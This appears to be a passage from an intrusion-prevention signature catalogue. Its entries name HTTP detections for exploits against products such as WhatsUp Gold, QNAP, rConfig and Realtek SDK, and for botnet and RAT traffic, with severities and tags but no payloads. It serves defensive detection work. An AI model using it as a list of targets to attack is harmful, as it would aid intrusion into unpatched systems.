HTTP_CRL-Progress-WhatsUp-Gold-GetSqlWhereClause-SQL-Injection-CVE-2024-46906

About this situation: An attempt to exploit a vulnerability in Progress Software WhatsUp Gold
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Progress-WhatsUp-Gold-GetSqlWhereClause-SQL-Injection-CVE-2024-46906
Description:
Back to top

HTTP_CRL-Progress-WhatsUp-Gold-SQL-Injection-CVE-2024-6670

About this situation: An attempt to exploit a vulnerability in Progress WhatsUp Gold detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1778-5242
Last changed: sgpkg-ips-1779-5242
Vulnerability: Progress-WhatsUp-Gold-SQL-Injection-CVE-2024-6670
Description:
Back to top

HTTP_CRL-Progress-WhatsUp-Gold-Testcontroller-Chart-Denial-Of-Service-Vulnerability

About this situation: An attempt to exploit a vulnerability in Progress Software WhatsUp Gold detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1760-5242
Last changed: sgpkg-ips-1760-5242
Vulnerability: Progress-WhatsUp-Gold-Testcontroller-Chart-Denial-Of-Service-Vulnerability
Description:
Back to top

HTTP_CRL-Project-GLPI-Htmlawedtest-Code-Injection

About this situation: An attempt to exploit a vulnerability in GLPI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1513-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: GLPI-Htmlawedtest-Code-Injection
Description:
Back to top

HTTP_CRL-ProjectSend-Improper-Authentication-CVE-2024-11680

About this situation: An attempt to exploit a vulnerability in ProjectSend detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ProjectSend, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1806-5242
Last changed: sgpkg-ips-1806-5242
Vulnerability: ProjectSend-Improper-Authentication-CVE-2024-11680
Description:
Back to top

HTTP_CRL-PRTG-Network-Monitor-Authenticated-RCE-CVE-2018-9276

About this situation: An attempt to exploit a vulnerability in PRTG Network Monitor detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, PRTG Network Monitor, CVE2018, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: PRTG-Network-Monitor-Authenticated-RCE-CVE-2018-9276
Description:
Back to top

HTTP_CRL-Psyme.Gen-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Win32.Trojan.Psyme.Gen-Botnet
Description:
Back to top

HTTP_CRL-Pulse-Connect-Secure-Template-Injection

About this situation: An attempt to exploit a vulnerability in Pulse Connect Secure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Pulse Secure, Any Hardware, CVE2020, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Vulnerability: Pulse-Connect-Secure-Template-Injection
Description:
Back to top

HTTP_CRL-Pulse-Secure-Diag.cgi-Command-Injection

About this situation: An attempt to exploit a vulnerability in Pulse Connect Secure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Pulse Secure, Any Hardware, CVE2019, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1190-5242
Vulnerability: Pulse-Secure-Diag.cgi-Command-Injection
Description:
Back to top

HTTP_CRL-Pulse-Secure-SSL-VPN-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Pulse Secure SSL VPN detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Pulse Secure, Any Hardware, CVE2019, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1194-5242
Vulnerability: Pulse-Secure-SSL-VPN-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Qakbot-Botnet-Traffic-2

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-926-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Qakbot-Botnet
Description:
Back to top

HTTP_CRL-Qakbot-Botnet-Traffic-3

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1146-5242
Last changed: sgpkg-ips-1316-5242
Vulnerability: Qakbot-Botnet
Description:
Back to top

HTTP_CRL-QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection

About this situation: An attempt to exploit a vulnerability in QNAP HBS 3 Hybrid Backup Sync detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, QNAP HBS 3 Hybrid Backup Sync, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1816-5242
Last changed: sgpkg-ips-1816-5242
Vulnerability: QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection
Description:
Back to top

HTTP_CRL-QNAP-Multiple-Products-Hls_Tmp-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in QNAP QTS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, QNAP QTS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Vulnerability: QNAP-Multiple-Products-Hls_Tmp-Directory-Traversal
Description:
Back to top

HTTP_CRL-QNAP-Multiple-Products-Log-Upload-Command-Injection

About this situation: An attempt to exploit a vulnerability in QNAP QTS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, QNAP QTS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: QNAP-Multiple-Products-Log-Upload-Command-Injection
Description:
Back to top

HTTP_CRL-QNAP-Multiple-Products-Privwizard-Username-Command-Injection

About this situation: An attempt to exploit a vulnerability in QNAP myQNAPcloud detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, QNAP QTS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1772-5242
Vulnerability: QNAP-Multiple-Products-Privwizard-Username-Command-Injection
Description:
Back to top

HTTP_CRL-QNAP-Photo-Station-Externally-Controlled-Reference-To-A-Resource-CVE-2022-27593

About this situation: An attempt to exploit a vulnerability in QNAP Photo Station detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, QNAP Photo Station, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Vulnerability: QNAP-Photo-Station-Externally-Controlled-Reference-To-A-Resource-CVE-2022-27593
Description:
Back to top

HTTP_CRL-QNAP-Photo-Station-Path-Traversal-Vulnerability-CVE-2019-7194

About this situation: An attempt to exploit a vulnerability in QNAP Photo Station detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, QNAP Photo Station, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1591-5242
Last changed: sgpkg-ips-1591-5242
Vulnerability: QNAP-Photo-Station-Path-Traversal-Vulnerability-CVE-2019-7194
Description:
Back to top

HTTP_CRL-QNAP-Q-Center-Virtual-Appliance-Change_Passwd-Command-Execution

About this situation: An attempt to exploit a vulnerability in QNAP Q-Center Virtual Appliance detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, QNAP Q-Center, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1134-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: QNAP-Q-Center-Virtual-Appliance-Change_Passwd-Command-Execution
Description:
Back to top

HTTP_CRL-QNAP-Remote-Code-Execution-CVE-2024-27130

About this situation: An attempt to exploit a vulnerability in QNAP NAS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, QNAP QTS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1730-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: QNAP-Remote-Code-Execution-CVE-2024-27130
Description:
Back to top

HTTP_CRL-QNAP-Viostor-NVR-Command-Injection-CVE-2023-47565

About this situation: An attempt to exploit a vulnerability in QNAP VioStor NVR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, QNAP VioStor NVR, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Vulnerability: QNAP-Viostor-NVR-Command-Injection-CVE-2023-47565
Description:
Back to top

HTTP_CRL-Quest-Kace-Systems-Management-Run_Cross_Report-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Quest Software KACE Systems Management detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Quest Software KACE Systems Management, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: Quest-Kace-Systems-Management-Run_Cross_Report-SQL-Injection
Description:
Back to top

HTTP_CRL-Raccoon-Stealer-Infection-Traffic

About this situation: Raccoon stealer infection traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1483-5242
Vulnerability: Raccoon-Stealer-Infection-Traffic
Description:
Back to top

HTTP_CRL-Ralio-Remote-File-Include-Input-Validation

About this situation: An attempt to exploit a Ralio Remote File Include Input Validation vulnerability.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ralio, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1503-5242
Vulnerability: Ralio-Remote-File-Include-Input-Validation
Description:
Back to top

HTTP_CRL-Rancher-Server-Docker-Exploit

About this situation: A Rancher Server Docker Exploit vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Rancher Server, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1023-5242
Vulnerability: Rancher-Server-Docker-Exploit
Description:
Back to top

HTTP_CRL-Ransom.KC-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.ScareWare.Ransom.KC-Botnet
Description:
Back to top

HTTP_CRL-RaspAP-Unauthenticated-Command-Injection

About this situation: An attempt to exploit a vulnerability in RaspAP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, RaspAP, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1669-5242
Last changed: sgpkg-ips-1669-5242
Vulnerability: RaspAP-Unauthenticated-Command-Injection
Description:
Back to top

HTTP_CRL-Ray-Agent-Job-RCE-CVE-2023-48022

About this situation: An attempt to exploit a vulnerability in Ray Agent
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ray Agent, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Ray-Agent-Job-RCE-CVE-2023-48022
Description:
Back to top

HTTP_CRL-rConfig-Ajaxarchivefiles.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in rConfig Network Device Configuration Tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1217-5242
Last changed: sgpkg-ips-1217-5242
Vulnerability: rConfig-Ajaxarchivefiles.php-Command-Injection
Description:
Back to top

HTTP_CRL-rConfig-Ajaxserversettingschk.php-Command-Injection

About this situation: A vulnerability in rConfig Network Device Configuration Tool
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: rConfig-Install-Command-Execution
rConfig-Ajaxserversettingschk.php-Command-Injection
Description:
Back to top

HTTP_CRL-rConfig-Commands.inc.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in rConfig Network Device Configuration Tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1237-5242
Vulnerability: rConfig-Commands.inc.php-SQL-Injection
Description:
Back to top

HTTP_CRL-rConfig-Compliancepolicies-Snippets.PHP-SQL-Injection

About this situation: An attempt to exploit a vulnerability in rConfig Network Device Configuration Tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1261-5242
Vulnerability: rConfig-Compliancepolicies.PHP-SQL-Injection
Description:
Back to top

HTTP_CRL-rConfig-Devices.inc.php-SQL-Injection

About this situation: A vulnerability in rConfig Network Device Configuration Tool
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1209-5242
Last changed: sgpkg-ips-1209-5242
Vulnerability: rConfig-Devices.inc.php-SQL-Injection
Description:
Back to top

HTTP_CRL-rConfig-Network-Device-Configuration-Ajaxcomparegetcmddates-SQL-Injection

About this situation: An attempt to exploit a vulnerability in rConfig Network Device Configuration Tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: rConfig-Network-Device-Configuration-Ajaxcomparegetcmddates-SQL-Injection
Description:
Back to top

HTTP_CRL-rConfig-Network-Device-Configuration-Tool-Ajaxaddtemplate.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in rConfig Network Device Configuration Tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1237-5242
Vulnerability: rConfig-Network-Device-Configuration-Tool-Ajaxaddtemplate.php-Command-Injection
Description:
Back to top

HTTP_CRL-rConfig-Network-Device-Configuration-Tool-Configdevice.php-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in rConfig Network Device Configuration Tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1275-5242
Vulnerability: rConfig-Network-Device-Configuration-Tool-Configdevice.php-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-rConfig-Network-Device-Configuration-Tool-DeviceMgmt-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in rConfig Network Device Configuration Tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: rConfig-Network-Device-Configuration-Tool-DeviceMgmt-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-rConfig-Search.crud.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in rConfig Network Device Configuration Tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, rConfig, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: rConfig-Search.crud.php-Command-Injection
Description:
Back to top

HTTP_CRL-Realtek-SDK-formSysCmd-Command-Execution-CVE-2021-35395

About this situation: An attempt to exploit a vulnerability in Realtek SDK detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Realtek SDK, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Vulnerability: Realtek-SDK-formSysCmd-Command-Execution-CVE-2021-35395
Description:
Back to top

HTTP_CRL-Realtek-SDK-formWsc-Command-Injection-CVE-2021-35395

About this situation: An attempt to exploit a vulnerability in Realtek SDK detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Realtek SDK, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: Realtek-SDK-formWsc-Command-Injection-CVE-2021-35395
Description:
Back to top

HTTP_CRL-Realtek-SDK-Miniigd-OS-Command-Injection

About this situation: An attempt to exploit a Realtek SDK miniigd OS Command Injection vulnerability.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Realtek SDK, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Realtek-SDK-Miniigd-OS-Command-Injection
Description:
Back to top

HTTP_CRL-Realtek-SDK-Stack-Buffer-Overflow-Vulnerabilities-CVE-2021-35395

About this situation: An attempt to exploit a vulnerability in Realtek SDK detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Realtek SDK, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: Realtek-SDK-Stack-Buffer-Overflow-Vulnerabilities-CVE-2021-35395
Description:
Back to top

HTTP_CRL-Redaeefe-Trojan-Infection-Traffic

About this situation: Redaeefe trojan infection traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1357-5242
Last changed: sgpkg-ips-1357-5242
Vulnerability: Redaeefe-Trojan-Infection-Traffic
Description:
Back to top

HTTP_CRL-Rejetto-HTTP-File-Server-(HFS)-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in Rejetto HTTP File Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Rejetto HttpFileServer, CVE2024, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1742-5242
Last changed: sgpkg-ips-1750-5242
Vulnerability: Rejetto-HTTP-File-Server-(HFS)-Unauthenticated-RCE
Description:
Back to top

HTTP_CRL-Reolink-Testemail-OS-Command-Injection-CVE-2019-11001

About this situation: An attempt to exploit a vulnerability in a Reolink device detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Reolink, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1816-5242
Last changed: sgpkg-ips-1816-5242
Vulnerability: Reolink-Testemail-OS-Command-Injection-CVE-2019-11001
Description:
Back to top

HTTP_CRL-Reprise-License-Manager-Diagnostics_doit-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Reprise Software License Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Reprise Software License Manager, Borland AccuRev, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Reprise-License-Manager-Diagnostics_doit-Directory-Traversal
Description:
Back to top

HTTP_CRL-Reprise-License-Manager-Edit_lf_Get_Data-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Reprise Software License Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Reprise Software License Manager, Borland AccuRev, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Reprise-License-Manager-Edit_lf_Get_Data-Directory-Traversal
Description:
Back to top

HTTP_CRL-Reprise-License-Manager-Edit_lf_Process-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Reprise Software License Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Reprise Software License Manager, Borland AccuRev, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Reprise-License-Manager-Edit_lf_Process-Directory-Traversal
Description:
Back to top

HTTP_CRL-Reprise-License-Manager-HTTP-Parameter-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Reprise Software License Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Reprise Software License Manager, Borland AccuRev, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Reprise-License-Manager-HTTP-Parameter-Parsing-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Reprise-License-Manager-Multiple-HTTP-Parameters-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Reprise Software License Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Reprise Software License Manager, Borland AccuRev, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Reprise-License-Manager-Multiple-HTTP-Parameters-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Responsive-File-Manager-Ajax_calls.php-Get_File-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Responsive File Manager Responsive File Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Responsive File Manager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1145-5242
Vulnerability: Responsive-File-Manager-Ajax_calls.php-Get_File-Directory-Traversal
Description:
Back to top

HTTP_CRL-Responsive-Filemanager-Ajax_calls.php-Zip-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Responsive File Manager Responsive File Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Responsive File Manager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1112-5242
Vulnerability: Responsive-Filemanager-Ajax_calls.php-Zip-Directory-Traversal
Description:
Back to top

HTTP_CRL-RevCode-RAT-C2-Traffic

About this situation: RevCode RAT C2 traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1394-5242
Vulnerability: RevCode-RAT-C2-Traffic
Description:
Back to top

HTTP_CRL-RIG-EK-Request

About this situation: A HTTP request resembling RIG Exploit Kit traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-927-5242
Last changed: sgpkg-ips-963-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CRL-Rocket-Chat-Pre-Auth-Blind-NoSQL-Injection

About this situation: An attempt to exploit a vulnerability in Rocket Chat
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Rocket Chat, CVE2021, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Vulnerability: Rocket-Chat-Pre-Auth-Blind-NoSQL-Injection
Description:
Back to top

HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Del-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Rocket software Servergraph Admin Center for TSM detected
Context: HTTP Normalized Request-Line
Severity: 7
